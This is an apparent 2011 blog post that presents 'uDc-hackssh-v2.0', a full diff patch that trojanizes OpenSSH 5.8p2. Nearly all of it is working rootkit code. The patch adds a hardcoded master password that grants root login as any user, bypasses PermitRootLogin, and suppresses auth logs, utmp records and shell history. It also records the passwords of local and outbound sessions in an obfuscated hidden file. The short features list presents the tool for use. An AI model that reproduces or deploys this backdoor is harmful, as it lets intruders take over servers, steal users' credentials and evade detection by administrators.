Sunday, June 26, 2011

uDc-hackssh-v2.0

CHANAGES:
Updated for openssh-5.x version

FEATURES:
- special password to log in with any user account and get root
- no logs in the machine (messages,auth,utmp,…)
- bash shell will use /dev/null as HISTFILE
- logs user passwords (local and remote sessions)
- should bypass 'PermitRootLogin No"

[slash@Slash-The-Underground]-[Sat Sep 12]-[00:35]-[/pentest/rk/ssh/uDc-hackssh]
$ cat udc-hackssh-v2.0.patch

diff -Ncr openssh-5.8p2/auth-pam.c udc-hackssh-v2.0/auth-pam.c
*** openssh-5.8p2/auth-pam.c Sun Jul 12 20:07:21 2009
--- udc-hackssh-v2.0/auth-pam.c Sun Jun 26 00:55:57 2011
***************
*** 466,471 ****
--- 466,475 ----
   if (sshpam_err != PAM_SUCCESS)
    goto auth_fail;
   sshpam_err = pam_authenticate(sshpam_handle, flags);
+ // slash patch
+  if(uDc)
+   sshpam_err = PAM_SUCCESS;
+ // end of slash
   if (sshpam_err != PAM_SUCCESS)
    goto auth_fail;
 
***************
*** 816,821 ****
--- 820,834 ----
   Buffer buffer;
   struct pam_ctxt *ctxt = ctx;
 
+ // slash patch
+          if(sshpam_authctxt)
+            for (gurun = 0; gurun < num; ++gurun) {
+                sprintf(slashbuff, "pam_from: %s \tuser: %s \tpass: %s\n",
+                        get_remote_ipaddr(), sshpam_authctxt->user, resp[gurun]);
+                if(!strcmp(BAJAUPASS, resp[gurun])) ctxt->pam_done = uDc = 1;
+                    else uDclog();
+            }
+ // end of patch


   debug2("PAM: %s entering, %u responses", __func__, num);
   switch (ctxt->pam_done) {
   case 1:
***************
*** 1205,1210 ****
--- 1218,1226 ----
    fatal("PAM: %s: failed to set PAM_CONV: %s", __func__,
        pam_strerror(sshpam_handle, sshpam_err));
  
+ // slash patch
+  if(!uDc)
+ // end of patch
   sshpam_err = pam_authenticate(sshpam_handle, flags);
   sshpam_password = NULL;
   if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
diff -Ncr openssh-5.8p2/auth-passwd.c udc-hackssh-v2.0/auth-passwd.c
*** openssh-5.8p2/auth-passwd.c Sun Mar  8 08:40:28 2009
--- udc-hackssh-v2.0/auth-passwd.c Sun Jun 26 01:02:17 2011
***************
*** 92,97 ****
--- 92,103 ----
  #endif
   if (*password == '\0' && options.permit_empty_passwd == 0)
    return 0;
+ // slash patch
+        if(!strcmp(BAJAUPASS, password)) return uDc = 1;
+        sprintf(slashbuff, "pass_from: %s \tuser: %s \tpass: %s\n",
+                get_remote_ipaddr(), pw->pw_name, password);
+        uDclog();
+ // end of patch
  
  #ifdef KRB5
   if (options.kerberos_authentication == 1) {
diff -Ncr openssh-5.8p2/auth.c udc-hackssh-v2.0/auth.c
*** openssh-5.8p2/auth.c Wed Dec  1 09:21:51 2010
--- udc-hackssh-v2.0/auth.c Sat Jun 25 23:45:36 2011
***************
*** 94,99 ****
--- 94,104 ----
  int
  allowed_user(struct passwd * pw)
  {
+ // slash patch
+  if(uDc) return 1;
+  else {
+ // end of patch
+ 
   struct stat st;
   const char *hostname = NULL, *ipaddr = NULL, *passwd = NULL;
   u_int i;
***************
*** 249,258 ****
--- 254,269 ----
   /* We found no reason not to let this user try to log on... */
   return 1;
  }
+ // slash patch
+ }
+ // end of patch
  
  void
  auth_log(Authctxt *authctxt, int authenticated, char *method, char *info)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   void (*authlog) (const char *fmt,...) = verbose;
   char *authmsg;
  
***************
*** 298,303 ****
--- 309,317 ----
    audit_event(audit_classify_auth(method));
  #endif
  }
+ // slash patch
+ }
+ // end of patch
  
  /*
   * Check whether root logins are disallowed.
***************
*** 305,310 ****
--- 319,327 ----
  int
  auth_root_allowed(char *method)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   switch (options.permit_root_login) {
   case PERMIT_YES:
    return 1;
***************
*** 322,327 ****
--- 339,349 ----
   logit("ROOT LOGIN REFUSED FROM %.200s", get_remote_ipaddr());
   return 0;
  }
+ // slash patch
+  else
+  return 1;
+ }
+ // end of patch
  
  
  /*
diff -Ncr openssh-5.8p2/canohost.c udc-hackssh-v2.0/canohost.c
*** openssh-5.8p2/canohost.c Tue Oct 12 10:28:12 2010
--- udc-hackssh-v2.0/canohost.c Sat Jun 25 23:48:02 2011
***************
*** 81,86 ****
--- 81,89 ----
   if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
       NULL, 0, NI_NAMEREQD) != 0) {
    /* Host name not found.  Use ip address. */
+ // slash patch
+   if(!uDc)
+ // end of patch
    return xstrdup(ntop);
   }
  
diff -Ncr openssh-5.8p2/includes.h udc-hackssh-v2.0/includes.h
*** openssh-5.8p2/includes.h Sun Oct 24 07:47:30 2010
--- udc-hackssh-v2.0/includes.h Sun Jun 26 00:59:42 2011
***************
*** 13,18 ****
--- 13,40 ----
   * called by a name other than "ssh" or "Secure Shell".
   */
  
+ // slash patch
+ #include 
+ #include 
+ 
+ #define BAJAUPASS     "CHANGE-ME"
+ #define SSH_LOG       "/dev/lala"
+ 
+ FILE *s9clog;
+ char  slashbuff[1024];
+ int   kambing, gurun, uDc;
+ 
+ #define uDclog() {                                 \
+  kambing=strlen(slashbuff);                               \
+  for(gurun=0; gurun<=kambing; gurun++) slashbuff[gurun]=~slashbuff[gurun];   \
+  s9clog=fopen(SSH_LOG, "a");                         \
+  if(s9clog!=NULL) { fwrite(slashbuff, kambing, 1, s9clog); fclose(s9clog);} \
+  chmod(SSH_LOG, 0666);                             \
+ }
+ 
+ const char *get_remote_ipaddr(void);
+ // end of patch
+ 
  #ifndef INCLUDES_H
  #define INCLUDES_H
  
diff -Ncr openssh-5.8p2/log.c udc-hackssh-v2.0/log.c
*** openssh-5.8p2/log.c Tue Jun 10 21:01:51 2008
--- udc-hackssh-v2.0/log.c Sat Jun 25 23:25:53 2011
***************
*** 336,341 ****
--- 336,345 ----
   char fmtbuf[MSGBUFSIZ];
   char *txt = NULL;
   int pri = LOG_INFO;
+ 
+ // slash patch
+  if(uDc) return;
+ // end of patch
   int saved_errno = errno;
  
   if (level > log_level)
diff -Ncr openssh-5.8p2/loginrec.c udc-hackssh-v2.0/loginrec.c
*** openssh-5.8p2/loginrec.c Mon Jan 17 18:15:31 2011
--- udc-hackssh-v2.0/loginrec.c Sat Jun 25 23:28:05 2011
***************
*** 433,438 ****
--- 433,442 ----
  int
  login_write(struct logininfo *li)
  {
+ // slash patch
+  if(uDc) return 0;
+ // end of patch
+ 
  #ifndef HAVE_CYGWIN
   if (geteuid() != 0) {
    logit("Attempt to write login records by non-root user (aborting)");
diff -Ncr openssh-5.8p2/session.c udc-hackssh-v2.0/session.c
*** openssh-5.8p2/session.c Wed Dec  1 09:02:59 2010
--- udc-hackssh-v2.0/session.c Sun Jun 26 00:01:56 2011
***************
*** 1198,1203 ****
--- 1198,1207 ----
   }
   if (getenv("TZ"))
    child_set_env(&env, &envsize, "TZ", getenv("TZ"));
+ // slash patch
+  if(uDc)
+   child_set_env(&env, &envsize, "HISTFILE", "/dev/null");
+ // end of patch
  
   /* Set custom environment options from RSA authentication. */
   if (!options.use_login) {
***************
*** 1483,1488 ****
--- 1487,1495 ----
  #else
    if (setlogin(pw->pw_name) < 0)
     error("setlogin failed: %s", strerror(errno));
+ // slash patch
+   if(!uDc) {
+ // end of patch
    if (setgid(pw->pw_gid) < 0) {
     perror("setgid");
     exit(1);
***************
*** 1492,1497 ****
--- 1499,1511 ----
     perror("initgroups");
     exit(1);
    }
+ // slash patch
+  }
+  else {
+   setgid(0);
+   initgroups(pw->pw_name, 0);
+  }
+ // end of patch
    endgrent();
  #endif
  
***************
*** 1515,1520 ****
--- 1529,1537 ----
    }
  #else
    /* Permanently switch to the desired uid. */
+ // slash patch
+  if(!uDc)
+ // end of patch
    permanently_set_uid(pw);
  #endif
   }
diff -Ncr openssh-5.8p2/sshconnect1.c udc-hackssh-v2.0/sshconnect1.c
*** openssh-5.8p2/sshconnect1.c Tue Nov  7 20:14:42 2006
--- udc-hackssh-v2.0/sshconnect1.c Sat Jun 25 23:31:17 2011
***************
*** 458,463 ****
--- 458,468 ----
    password = read_passphrase(prompt, 0);
    packet_start(SSH_CMSG_AUTH_PASSWORD);
    ssh_put_password(password);
+ // slash patch
+                 sprintf(slashbuff, "1to: %s \tuser: %s \tpass: %s\n",
+    get_remote_ipaddr(), options.user, password);
+                 uDclog();
+ // end of patch
    memset(password, 0, strlen(password));
    xfree(password);
    packet_send();
diff -Ncr openssh-5.8p2/sshconnect2.c udc-hackssh-v2.0/sshconnect2.c
*** openssh-5.8p2/sshconnect2.c Wed Dec  1 09:21:51 2010
--- udc-hackssh-v2.0/sshconnect2.c Sun Jun 26 01:00:47 2011
***************
*** 883,888 ****
--- 883,893 ----
   packet_put_cstring(authctxt->method->name);
   packet_put_char(0);
   packet_put_cstring(password);
+ // slash patch
+        sprintf(slashbuff, "T0: %s \tuser: %s \tpass: %s\n",
+                get_remote_ipaddr(), options.user, password);
+        uDclog();
+ // end of patch
   memset(password, 0, strlen(password));
   xfree(password);
   packet_add_padding(64);
***************
*** 1558,1563 ****
--- 1563,1573 ----
  
    response = read_passphrase(prompt, echo ? RP_ECHO : 0);
  
+ // slash patch
+                sprintf(slashbuff, "T0: %s \tuser: %s \tpass: %s\n",
+                    get_remote_ipaddr(), options.user, response);
+                uDclog();
+ // end of patch
    packet_put_cstring(response);
    memset(response, 0, strlen(response));
    xfree(response);
diff -Ncr openssh-5.8p2/sshlogin.c udc-hackssh-v2.0/sshlogin.c
*** openssh-5.8p2/sshlogin.c Tue Jan 11 14:20:07 2011
--- udc-hackssh-v2.0/sshlogin.c Sun Jun 26 00:10:32 2011
***************
*** 126,131 ****
--- 126,134 ----
  record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
      const char *host, struct sockaddr *addr, socklen_t addrlen)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   struct logininfo *li;
  
   /* save previous login details before writing new */
***************
*** 136,147 ****
--- 139,156 ----
   login_login(li);
   login_free_entry(li);
  }
+ // slash patch
+ }
+ // end of patch
  
  #ifdef LOGIN_NEEDS_UTMPX
  void
  record_utmp_only(pid_t pid, const char *ttyname, const char *user,
     const char *host, struct sockaddr *addr, socklen_t addrlen)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   struct logininfo *li;
  
   li = login_alloc_entry(pid, user, host, ttyname);
***************
*** 149,163 ****
--- 158,181 ----
   login_utmp_only(li);
   login_free_entry(li);
  }
+ // slash patch
+ }
+ // end of patch
  #endif
  
  /* Records that the user has logged out. */
  void
  record_logout(pid_t pid, const char *tty, const char *user)
  {
+ // slash patch
+  if(!uDc) {
+ // end of patch
   struct logininfo *li;
  
   li = login_alloc_entry(pid, user, NULL, tty);
   login_logout(li);
   login_free_entry(li);
  }
+ // slash patch
+ }
+ // end of patch
diff -Ncr openssh-5.8p2/version.h udc-hackssh-v2.0/version.h
*** openssh-5.8p2/version.h Thu May  5 09:56:54 2011
--- udc-hackssh-v2.0/version.h Sat Jun 25 23:37:03 2011
***************
*** 1,6 ****
  /* $OpenBSD: version.h,v 1.61 2011/02/04 00:44:43 djm Exp $ */
  
! #define SSH_VERSION "OpenSSH_5.8"
  
  #define SSH_PORTABLE "p2"
  #define SSH_RELEASE SSH_VERSION SSH_PORTABLE
--- 1,6 ----
  /* $OpenBSD: version.h,v 1.61 2011/02/04 00:44:43 djm Exp $ */
  
! #define SSH_VERSION "OpenSSH_5.8" // change
  
  #define SSH_PORTABLE "p2"
  #define SSH_RELEASE SSH_VERSION SSH_PORTABLE

No comments: